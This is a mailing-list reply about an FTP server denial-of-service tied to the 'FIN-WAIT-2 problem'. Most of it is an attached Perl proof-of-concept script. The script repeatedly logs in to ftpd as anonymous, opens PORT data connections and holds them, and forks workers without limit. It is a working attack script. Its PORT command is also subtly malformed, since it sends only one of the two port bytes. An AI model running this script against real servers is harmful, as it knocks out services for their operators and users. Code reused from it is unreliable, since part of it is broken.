In some mail from Theo de Raadt, sie said:
[...]
> The OpenBSD ftpd has never permitted more than 1 connection at a time
> in PASV mode, thus this particular denial of service attack does not
> work.
Excellent.
> I caused myself some difficulties by accidentally starting up 400 perl
> instances, though..
There's no helping pilot error ;)
Below is an attached Perl script which attacks based on the FIN-WAIT-2
`problem'.
Darren
#!/usr/bin/perl
# Proof-of-concept from the thread above: repeatedly opens FTP control
# connections to $DOS_HOST, logs in as anonymous and drives active-mode
# (PORT) data transfers, forking a new worker on every pass. Posted to
# demonstrate the denial-of-service condition in ftpd referred to above
# as the `fin-wait-2 problem'; the thread also notes that a per-session
# data-connection limit in the server (as in OpenBSD ftpd) is the
# mitigation. Written without strict/warnings, so every variable below
# is a package global shared across the whole script.
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;   # saved but never referenced elsewhere in this script
$num = 0;    # index into @conn/@lsock for the next data connection
while (1) {
# fork() returns the child's pid in the parent and 0 in the child, so the
# parent runs this loop body and forks again on each iteration, while the
# child leaves the loop, sleeps below and re-enters the outer loop as a
# new forker. This is likely the source of the runaway process counts
# mentioned in the thread.
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);
last if (!$sock);
# Local address of the control connection; its IP is reused for PORT.
$me = getsockname($sock);
($mport, $mip) = unpack_sockaddr_in($me);
# Unreachable: the `last' above already exits this loop when $sock is false.
if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}
$sock->autoflush(1);
# Echo every server reply to stdout and respond according to reply code.
while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
if (/^150 .*/) {
# Transfer starting: accept the server's data connection on the
# listener created below and keep the accepted socket open in @conn.
$conn[$num++] = $x->accept();
} elsif (/^200 .*/) {
print $sock "NLST\r\n";
} elsif (/^230 .*/ || /^226 .*/) {
# After login or a completed transfer, open a fresh listening socket
# on the control connection's local address and advertise it via PORT.
$x = IO::Socket::INET->new(
Proto => "tcp",
LocalAddr => inet_ntoa($mip),
Listen => 1,
);
last if (!$x);
$lsock[$num] = $x;
$local = getsockname($x);
($lport, $lip) = unpack_sockaddr_in($local);
($sip = inet_ntoa($mip)) =~ s/\./,/g;   # dotted quad -> comma-separated form used by PORT
$lp[0] = $lport >> 8;
$lp[1] = $lport & 0xff;
print $sock "PORT $sip,$lp[1]\r\n";
}
last if (/^530 .*/);   # login refused: stop talking on this control connection
}
waitpid -1,0;   # reap one child before the next pass
}
sleep(5);   # reached by the child side of fork(); then the outer loop forks again
}